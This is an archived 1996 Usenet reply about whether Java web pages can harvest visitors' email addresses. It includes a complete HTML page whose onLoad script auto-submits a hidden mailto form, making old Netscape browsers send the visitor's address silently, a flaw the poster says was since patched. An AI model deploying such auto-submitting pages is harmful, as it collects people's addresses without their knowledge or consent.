home *** CD-ROM | disk | FTP | other *** search
/ NetNews Offline 2 / NetNews Offline Volume 2.iso / news / comp / sys / amiga / datacomm / 1884 < prev    next >
Encoding:
Text File  |  1996-08-05  |  2.7 KB  |  67 lines
  1. Path: erinews.ericsson.se!usenet
  2. From: Jonas Elfstrom <jonas@plea.se>
  3. Newsgroups: comp.sys.amiga.datacomm
  4. Subject: Re: HotJava Question
  5. Date: Mon, 18 Mar 1996 15:13:27 +0000
  6. Organization: PLEA http://plea.se/
  7. Message-ID: <314D7D97.2D2A@plea.se>
  8. References: <4i7m64$pl5@Holly.aa.net> <1217.6649T1272T2343@four.net> <4ihahf$fn@news.mistral.co.uk>
  9. NNTP-Posting-Host: klpc010.ericsson.se
  10. Mime-Version: 1.0
  11. Content-Type: text/plain; charset=us-ascii
  12. Content-Transfer-Encoding: 7bit
  13. X-Mailer: Mozilla 2.0 (WinNT; I)
  14.  
  15. Lars Janssen wrote:
  17. > Mike Gratis (ironman@four.net) wrote:
  18. > > >I read that Java has an optional utility which snatches the address of
  19. > > >anyone browsing a java website, so that the website can compile an
  20. > > >e-mailing list of potential customers for whatever it is they are selling.
  21. > >
  22. > > >This sounds intrusive.  The idea of sifting through garbage e-mail
  23. > >
  24. > >       Welcome to the electronic age!  I can understand what you're
  25. > > saying; but I can't blame them for using /their/ Web site as a tool for
  26. > > their business.  I guess the bottom line is to avoid Web sites that use
  27. > > this practice -- If you don't want to get unwanted mail or whatever.
  28. > > Actually, I'm quite surprised that this type of thing hasn't been used
  29. > > to a much greater extent.
  31. > This is surprising, are we *sure* Java does this? I thought it was
  32. > meant to offer a certain degree of security - a Java applet running
  33. > on my machine shouldn't be able to access things like env:  variables
  34. > to get my userID without me at least knowing about it.
  35.  
  36. It's not Java, it's JavaScript.
  37. The HTML-page that could be used follows:
  38. <HTML>
  39. <HEAD>
  40. </HEAD>
  41. <BODY onLoad="document.mailme.submit()">
  42. <form method=post name="mailme" action="mailto:user@your.host.com?subject=scammed 
  43. address">
  44. <h3>Viewing this page automatically submits email to an address which then sends 
  45. you back email to prove it grabbed the message.</h3>
  46. <input type=hidden name="scammed.the.address" value="did it">
  47. </form>
  48. </BODY></HTML>
  49.  
  50. The script makes Netscape mail you a message and then you have an utility that
  51. automatically mails the sender a reply... If the user has specified his email in
  52. Netscape preferences then he will get it.
  53.  
  54. > As for web servers in general, they can't get the e-mail address of a
  55. > client at the moment, just the machine name (that *must* be available
  56. > as it's got to send the packets of data back!) I don't see how Java
  57. > can change that. Hopefully! :-)
  58.  
  59. I've heard that Netscape has released a new version that prevents this trick.
  60.  
  61. Sorry for being completely off topic.
  62.  
  63. -- 
  64.  / Jonas Elfstrom       (5+ rows .sigs sux)       jonas@plea.se  \
  65. < Amiga, Linux, ISP, C, 680x0/6502.  Guinness.  Suede, Oasis, SP. >
  66.  \ We are here to PLEAse you.  +46 19 322010   http://www.plea.se/
  67.